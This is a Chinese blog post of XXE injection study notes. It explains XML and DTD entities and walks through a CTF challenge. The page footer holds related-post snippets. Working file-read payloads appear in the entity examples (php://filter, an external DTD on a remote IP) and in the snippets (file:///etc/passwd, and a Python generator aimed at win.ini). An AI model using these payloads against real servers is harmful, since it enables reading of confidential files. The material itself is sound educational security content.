XXE学习笔记

最新推荐文章于 2022-11-02 15:27:00 发布
最新推荐文章于 2022-11-02 15:27:00 发布
阅读量341 收藏
点赞数 1
文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52560434/article/details/119531181
版权

文章目录

前言

这里主要记录一下这几天学习xxe的内容,以及自己的一些心得体会

以下是本篇文章正文内容

一、XXE概念

XXE全称是XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。

二、基础知识

1.XML

1、特征
✦ XML是可扩展标记语言(EXtensible Markup Language),是一种很像HTML的标记语言。
✦XML被设计用来传输和存储数据,HTML则用来显示数据
✦XML标签没有被预定义,需要自定义标签
✦是W3C的推荐标准

2、XML文档结构
✦XML声明
✦DTD文档类型定义
✦文档元素
基本框架如下:

<!--这是注释-->
<!--XML声明-->
<?xml version="1.0"?>

<!--文档类型定义-->
<!DOCTYPE note [  <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)>  <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>     <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)>   <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)>   <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)>   <!--定义body元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

2.DTD介绍

DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束,也就是说,DTD是用来规范XML文档的格式的。可以嵌入在XML文档中(内部声明),也可以独立的放在一个文件中(外部引用)。

DTD一般认为有两种引用或声明方式:
1、内部DTD:即对XML文档中的元素、属性和实体的DTD的声明都在XML文档中。
2、外部DTD:即对XML文档中的元素、属性和实体的DTD的声明都在一个独立的DTD文件(.dtd)中。
(网上有提到的引用公共DTD其实也算外部引用DTD的一种)

一下是几种实体的格式:
✦内部实体

<!DOCTYPE note [
    <!ENTITY a "admin">
]>
<note>&a</note>
<!-- admin -->

✦内部参数实体

<!DOCTYPE note> [
    <!ENTITY % b "<!ENTITY b1 "awsl">">
    %b;
]>
<note>&b1</note>
<!-- awsl -->

✦外部实体

<!DOCTYPE note> [
    <!ENTITY c SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
]>
<note>&c</note>
<!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== -->

✦外部参数实体

<!DOCTYPE note> [
    <!ENTITY % d SYSTEM "http://47.106.143.26/xml.dtd">
    %d;
]>
<note>&d1</note>
<!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== -->


参数实体用% name申明,引用时用%name;,只能在DTD中申明,DTD中引用。
其余实体直接用name申明,引用时用&name;,只能在DTD中申明,可在xml文档中引用
外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下所示:

三、XXE漏洞原理及相关题目

1、原理

刚才介绍过,XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是XML外部实体,注意这四个字,外部实体。如果能注入外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面。

2、题目

当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
xxe 漏洞触发的点往往是可以上传 xml 文件的位置,没有对上传的 xml 文件进行过滤,导致可上传恶意 xml 文件。
题目链接http://web.jarvisoj.com:9882/

在这里插入图片描述点击链接没有明显的回应,查看源码没有什么有用的信息,尝试抓包

在这里插入图片描述尝试将将Content-Type: application/json修改为 Content-Type: application/xml 构造XXE,先内部注入,看xml是否能被解析
在这里插入图片描述可以被解析,先尝试外部注入,
在这里插入图片描述

发现可以读取文件,在这里插入图片描述找到flag

这篇文章详细讲了xxe漏洞许多其他方面的应用,这里就不多说了
https://xz.aliyun.com/t/3357#toc-5

总结

总的来说,知识面还是比较狭窄,只是对之前学习的关于xxe的基础知识进行大概的总结,还有许多细节方面没有写完整,对于xxe漏洞复现和实操还没有过多的深入。笔者将会继续学习这方面的知识,争取对xxe有更深的认识
参考文献:https://www.cnblogs.com/20175211lyz/p/11413335.html
https://xz.aliyun.com/t/3357#toc-4
https://xz.aliyun.com/t/3357#toc-24

yeaherey
关注
XXE笔记
m0_47599604的博客
03-28 176
目录 XML及DTD介绍 简介 DTD PCDATA CDATA 实体 内部实体声明 XXE漏洞介绍 挖掘技巧及修复 挖掘方式 漏洞利用 漏洞修复 XML及DTD介绍 简介 XML指可扩展标记语言(EXtensible Markup Lanuage),设计用来进行数据的传输和存储。 XML是一种标记语言,很类似HTML XML的设计宗旨是传输数据,而非显示数据 XML标签没有被定义。需要自行定义标签 XML被设计为具有自我描述性 XML是W3C的推荐标准
【CTF-Web】XXE学习笔记(附ctfshow例题)
jayq1的博客
05-29 2222
XXE学习笔记
XXE漏洞笔记
公众号shadow sock7
06-30 2985
参考: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-059911.html http://bobao.360.cn/learning/detail/3841.html http://blog.youkuaiyun.com/u011721501/article/details/43775691 http://thief.one/2017/06/20/1
学习笔记-XXE
人饭子的博客
11-02 220
XXE 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 描述 XXE 就是 XML 外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。文档类型定义 (DTD) 的作用是定义 X...
XXE总结
weixin_43940853的博客
03-03 286
XXE 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 我们在本地测试xxe https://github.com/c0ny1/...
web 渗透测试项目学习笔记.zip
11-29
除此之外,学习笔记还包括了对Java组件安全、XXE笔记、XSS笔记、安全加固与网络路由笔记、内网渗透笔记、数据库技术等多个方面的深入探讨。Java组件安全部分会介绍Java应用程序中可能存在的安全漏洞以及相应的防范...
Web安全学习笔记.pdf
10-22
《Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...
完整的Java代码审计学习笔记资源(免费下载)
10-31
java代码审计-xxe.md 第一的 4年前 java代码审计-反序列化.md 添加一些关于 jndi 的内容 3年前 java代码审计-命令执行.md 第一的 4年前 java代码审计-文件操作.md 第一的 4年前 java代码审计-环境搭建+前置知识.md ...
八、漏洞原理及利用(5)XXE 笔记和靶场
weixin_45540609的博客
05-08 443
一、XXE XML外部实体攻击(用户输入数据被当做XML实体代码执行,然后利用DTD部分可以通过SYSTEM关键词发起网络请求,从而获得数据) 典型攻击,定义实体必须写在DTD部分 外部实体是TDT部分的一个特殊地方(SYSTEM)可以调用外部文件进行XML文件的规划(可以发起网络请求) 1、XML 一种类似html的语言,用于传输数据,没有被预定义,需要自行定义标签 2、原理 有了XML实体,关键字’SYSTEM’会令XML解析器从URI中读取内容,并允许它在XML文档中被替换。 .
WEB安全的总结学习与心得(十三)——XXE实体注入漏洞
weixin_44681434的博客
01-29 430
WEB安全的总结与心得(十三) 01 文件操作 操作内容 文件上传 上传Webshell;上传木马 文件下载 下载系统任意文件;下载程序代码 常见文件操作漏洞 文件上传漏洞;任意文件下载漏洞;文件包含漏洞 02 ...
XXE漏洞概述
爱党人士
05-24 1227
XXE(xml external entity -injection") 是xml的外部文档的一种注入漏洞。 首先来看一下xml的大体结构: DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。 主要出问题的大多是从DTD这部分出的。 DTD大体框架: DTD 内部声明 <! DOCTYPE 根元素 [元素声明]> DTD 外部...
XXE-什么是XXE
qq_45514735的博客
03-05 2211
简单来说,XXE就是XML外部实体注入。 当允许引用外部实体时,通过构造恶意内容, 就可能导致任意文件读取、系统命令执行、 内网端口探测、攻击内网网站等危害。 XML XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 DTD DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。 DTD 可以在 XML 文档内声明,也可以外部引用。...
xxe漏洞简介
u011066706的专栏
04-17 4201
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
初识XXE漏洞
Websec
03-22 1万+
0X01:何为XXE漏洞?XXE是指xml外部实体攻击0x02:那么xml是什么?xml实体攻击是什么?XML百度是这样子的:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言...
XXE知识总结,有这篇就够了!
热门推荐
南迪叶先森
07-14 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! XXE基础 XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XML开始。 XML基础 XML 指可扩展标记语言(EXtensible Markup Lang.
WebGoat靶场xxe题目练习笔记
最新发布
03-18
### 关于 WebGoat 中 XXE 漏洞题目的解题思路与练习笔记 #### 什么是 XXE 漏洞? XML 外部实体 (XXE) 漏洞允许攻击者通过恶意构建的 XML 文档利用应用程序解析器的功能,读取本地文件、执行远程代码或发起拒绝服务攻击。这种漏洞通常发生在服务器端未正确配置 XML 解析器的情况下[^1]。 --- #### WebGoat 平台简介 WebGoat 是由 OWASP 提供的一款 Java 应用程序靶场工具,旨在帮助开发者和安全研究人员了解并实践各种 Web 安全漏洞及其防护方法。它涵盖了多种常见漏洞类型,包括但不限于 XSS、SQL 注入以及 XXE 等[^2]。 --- #### WebGoat 中 XXE 题目概述 在 WebGoat 的 XXE 训练模块中,用户可以通过一系列挑战来熟悉如何发现和利用此类漏洞。以下是针对该部分的一些通用解题思路: 1. **理解目标环境** - 分析给定的应用逻辑,确认是否存在对用户提交数据(如上传文件或表单输入)中的 XML 数据进行处理的行为。 - 如果存在,则进一步验证其使用的 XML 解析库是否启用了外部实体加载功能。 2. **构造恶意 payload** 使用标准 DTD(文档类型定义),尝试引入外部资源路径作为测试载体。例如: ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> ``` 上述代码片段试图从 Linux 文件系统中提取 `/etc/passwd` 文件的内容,并将其嵌套到响应消息体里返回给客户端。 3. **观察反馈结果** 将上述请求发送至目标接口后,仔细查看服务器回传的数据包内容是否有预期敏感信息泄露现象发生;如果没有成功获取所需资料,则需调整策略重新尝试其他可能存在的薄弱环节直至达成最终目的为止。 4. **实施防御措施建议** 当完成所有指定任务之后,还需要掌握有效的缓解办法以防止实际生产环境中再次遭遇类似威胁情况的发生。具体做法如下所示: - 禁止不必要的特性支持——关闭 DOMParser 或 SAXParser 对外网链接地址的支持选项; - 设置严格的白名单机制过滤掉非法字符集编码形式; - 更新第三方依赖版本号保持最新状态从而减少潜在风险暴露面。 --- #### 示例代码展示 下面是一段简单的 Python 脚本用于自动化生成基本类型的 XXE 测试向量: ```python import xml.etree.ElementTree as ET def create_xxe_payload(entity_name, system_id): dtd = f'''<!DOCTYPE root [ <!ENTITY {entity_name} SYSTEM "{system_id}"> ]>''' root = ET.Element('root') tree = ET.ElementTree(root) # Add entity reference inside the element text. root.text = f'&{entity_name};' return '\n'.join([dtd, ET.tostring(root).decode()]) if __name__ == "__main__": print(create_xxe_payload("secret", "file:///C:/Windows/win.ini")) ``` 此函数接受两个参数分别代表自定义标签名称及要访问的目标位置字符串值,最后输出完整的符合要求格式化的 XML 结构化文本串以便后续操作调用。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值